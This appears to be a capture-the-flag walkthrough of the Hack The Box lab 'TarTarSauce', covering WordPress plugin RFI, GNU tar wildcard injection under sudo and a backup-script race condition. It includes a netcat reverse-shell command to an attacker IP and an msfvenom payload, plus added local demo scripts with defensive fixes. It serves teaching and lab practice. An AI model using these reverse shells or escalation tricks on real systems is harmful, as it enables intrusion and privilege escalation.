Today we are going to solve another CTF challenge, "TarTarSauce". It is a retired vulnerable lab presented by Hack The Box to help pentesters practise online penetration testing at their own experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Expert
Task: Find the user.txt and root.txt files
Note: Since these labs are available online, they have a static IP. The IP of TarTarSauce is 10.10.10.88.
Penetration Methodology
§ Network scanning (Nmap)
§ Directory enumeration (Dirb)
§ Plugin enumeration (WPScan) and exploitation of a WordPress plugin Remote File Inclusion (RFI) vulnerability
§ Spawning a TTY shell
§ Checking sudoers permissions
§ Tar wildcard injection for privilege escalation
§ Race condition in the backup script to get the root flag
Walkthrough
Let’s start off with our basic nmap command
to find out the open ports and services.
nmap -A 10.10.10.88
From the image below, you can observe that port 80 is open for the HTTP service, and the nmap script scan found a robots.txt with 5 disallowed entries.
Let's navigate to port 80 through a web browser. Entering the IP in the URL bar brings up the following web page, as shown in the image below.
We don't find anything on the web page, so we run dirb to enumerate directories. We find a directory called "/webservices/". As it shows nothing on its own, we enumerate "/webservices/" further.
dirb http://10.10.10.88
dirb http://10.10.10.88/webservices/
The dirb scan gives us the directory "/webservices/wp/", which hosts a WordPress site.
We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called "Gwolle Guestbook". Searching for an exploit shows that it is vulnerable to Remote File Inclusion (RFI).
We follow the proof of concept on Exploit-DB and use the php-reverse-shell.php that ships with Kali Linux, editing it to point at our IP and listening port. We copy it to the desktop and rename it to wp-load.php: the vulnerable plugin code includes a file of that name from an attacker-supplied base path, so a file named wp-load.php on our web server is what gets fetched and executed through the RFI. We then start a Python HTTP server to serve it to the target machine.
python -m SimpleHTTPServer 80
We set up a listener with netcat; as soon as we trigger the RFI, we get a reverse shell. In the "/home" directory we find a folder called "onuma" that we cannot access, so we spawn a TTY shell using python to check the sudoers list.
python -c 'import pty; pty.spawn("/bin/bash")'
We check the sudoers list and find that we can run /bin/tar as user "onuma" without a password. Since GNU tar accepts options placed after its operands, we can exploit wildcard injection for privilege escalation.
sudo -l
We create an nc reverse shell command using msfvenom.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R
Now we move to the reverse shell and write the generated nc command into a shell script saved as "wp.sh".
GNU tar can execute a command at each checkpoint via "--checkpoint-action=exec=..." together with "--checkpoint=1". Because tar parses options that appear after the operands, file names that look like options are treated as options when an unquoted * expands them onto the command line. So we create two empty files named "--checkpoint-action=exec=sh wp.sh" and "--checkpoint=1" next to wp.sh and run tar with *, which executes our script as user onuma. (Since sudo -l shows /bin/tar here with no argument restriction, the same options could also be passed directly; the wildcard trick is what matters when the tar command line is fixed, for example in a cron job.)
mkdir data
cd data
echo "mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0</tmp/cezbk | /bin/sh >/tmp/cezbk 2>&1; rm /tmp/cezbk" > wp.sh
echo "" > "--checkpoint-action=exec=sh wp.sh"
echo "" > --checkpoint=1
sudo -u onuma /bin/tar cf archive.tar *
(The echo line writing wp.sh was cut off after "0" in the original; the remainder shown is the standard form of the reverse_netcat payload, reconstructed with the fifo name the original used.)
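To see the wildcard injection work without the box, here is an added example that is not part of the original post: it plants the same two option-named files and a harmless stand-in for wp.sh in a scratch directory, runs the same tar invocation (without sudo) and checks that the payload actually ran; a second function shows the invocation that does not run it. It assumes GNU tar; the scratch directory and the marker file are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original post): reproduce the GNU tar wildcard
# injection locally, without sudo, to see why "tar cf archive.tar *" in a
# directory the attacker can write to runs attacker-chosen commands.
# Assumes GNU tar; scratch directory and marker file are constructed here.

# Plant the payload script and the two option-named files in a scratch
# directory, run the post's tar command, and report whether the payload
# executed. Returns 0 if it did, 1 otherwise.
wildcard_injection_demo() {
    local work marker
    work=$(mktemp -d) || return 1
    marker="$work/pwned"        # file the payload creates; proof of execution

    (
        cd "$work" || exit 1
        # Harmless stand-in for wp.sh (the post's reverse shell).
        printf 'touch "%s"\n' "$marker" > wp.sh
        # Two empty files whose NAMES are tar options. The unquoted * in the
        # tar command expands to them, and GNU tar parses them as options.
        : > '--checkpoint-action=exec=sh wp.sh'
        : > '--checkpoint=1'
        # Same command as the post, minus sudo -u onuma.
        tar cf archive.tar * >/dev/null 2>&1
    )

    if [ -f "$marker" ]; then
        echo "payload executed: $marker exists"
        rm -rf "$work"
        return 0
    fi
    echo "payload did not run (not GNU tar, or POSIXLY_CORRECT set?)"
    rm -rf "$work"
    return 1
}

# Same setup, but "--" ends option parsing and ./* keeps every expanded name
# from starting with a dash, so the files are archived as plain files.
# Returns 0 if the payload did NOT run.
wildcard_safe_demo() {
    local work marker
    work=$(mktemp -d) || return 1
    marker="$work/pwned"
    (
        cd "$work" || exit 1
        printf 'touch "%s"\n' "$marker" > wp.sh
        : > '--checkpoint-action=exec=sh wp.sh'
        : > '--checkpoint=1'
        tar cf archive.tar -- ./* >/dev/null 2>&1
    )
    if [ -f "$marker" ]; then
        rm -rf "$work"
        return 1
    fi
    rm -rf "$work"
    return 0
}

wildcard_injection_demo
wildcard_safe_demo && echo "with -- ./* the payload does not run"
```

The payload runs at the first checkpoint, i.e. as soon as tar writes a record, which is why even an archive of three tiny files is enough. The fix is on the defender's side of the command line: terminate options with "--" (or use "--no-recursion -T" with a file list), never let an unquoted glob from a writable directory reach a privileged tar.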
We set up our netcat listener and, as soon as we run the tar command as user "onuma", we get a reverse shell as "onuma". We change directory to /home/onuma, find the file "user.txt" and read its content to get the first flag. After finding the flag we spawn a TTY shell using python.
python -c 'import pty; pty.spawn("/bin/bash")'
Enumerating the system, we find a file called "backuperer" that is symlinked to a file named "backup" in the "/usr/local/bin" directory.
Looking at its content, we find that it is a script that creates a gzip archive of the files under "/var/www/html/", sleeps for 30 seconds, and then checks the integrity of the archive it created.
We use a script that takes advantage of that sleep. Because the backup job waits 30 seconds between creating the archive and checking it, we have a 30-second window in which to replace the archive with one of our own, so the later check operates on attacker-controlled content: a classic time-of-check to time-of-use race. We use this script here. After running the script we find the root flag.
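The race window described above, as an added example that is not the box's backuperer script: a cut-down stand-in for a backup job of the same shape (archive, sleep, unpack and verify) runs in the background while a watcher polls for the archive and overwrites it inside the window. The 3-second window, the directories and the file contents are all constructed for the demo; what the real job does with a failed check is box-specific and not reproduced here.

```shell
#!/bin/sh
# Added example, not the box's backuperer script: a stand-in for a backup
# job that archives, sleeps, then verifies, next to a watcher that swaps
# the archive during the sleep. Window, paths and contents are constructed
# for this demo; the real job on the box waits 30 seconds.

# Stand-in for the privileged job. Archives $1 into $2, sleeps $3 seconds,
# unpacks the archive and diffs it against the source. Returns 0 if the
# archive still matches the source, 1 if the check finds a difference.
mock_backuperer() {
    local src archive window check
    src=$1; archive=$2; window=$3
    check=$(mktemp -d) || return 2
    tar -zcf "$archive" -C "$src" . 2>/dev/null
    sleep "$window"                       # the race window
    tar -zxf "$archive" -C "$check" 2>/dev/null
    if diff -r "$src" "$check" >/dev/null 2>&1; then
        rm -rf "$check"; return 0
    fi
    rm -rf "$check"; return 1
}

# Attacker side: poll (up to $3 seconds) until the archive appears, then
# overwrite it with an archive built from attacker-chosen content in $2.
race_swap_archive() {
    local archive payload_dir deadline i
    archive=$1; payload_dir=$2; deadline=$3; i=0
    while [ ! -f "$archive" ]; do
        i=$((i + 1))
        [ "$i" -gt "$deadline" ] && return 1
        sleep 1
    done
    tar -zcf "$archive" -C "$payload_dir" . 2>/dev/null
}

# Run both halves. Returns 0 when the swap landed inside the window, i.e.
# the job's own check unpacked and compared the attacker's archive.
run_race_demo() {
    local src payload tmp archive job swapped verified
    src=$(mktemp -d); payload=$(mktemp -d); tmp=$(mktemp -d)
    archive=$tmp/backup.tar.gz
    echo "original web content" > "$src/index.html"     # constructed
    echo "attacker content" > "$payload/index.html"      # constructed
    echo "planted" > "$payload/planted.txt"              # constructed

    mock_backuperer "$src" "$archive" 3 &
    job=$!
    race_swap_archive "$archive" "$payload" 10
    swapped=$?
    wait "$job"
    verified=$?
    rm -rf "$src" "$payload" "$tmp"
    [ "$swapped" -eq 0 ] && [ "$verified" -eq 1 ]
}

run_race_demo && echo "archive swapped inside the window; the check saw attacker content"
```

The defensive lesson is the same whatever the job does after the check: a privileged script must not sleep on, and then trust, an artefact that sits in a location a lower-privileged user can write to; keep the archive in a root-only directory or verify a hash taken at creation time.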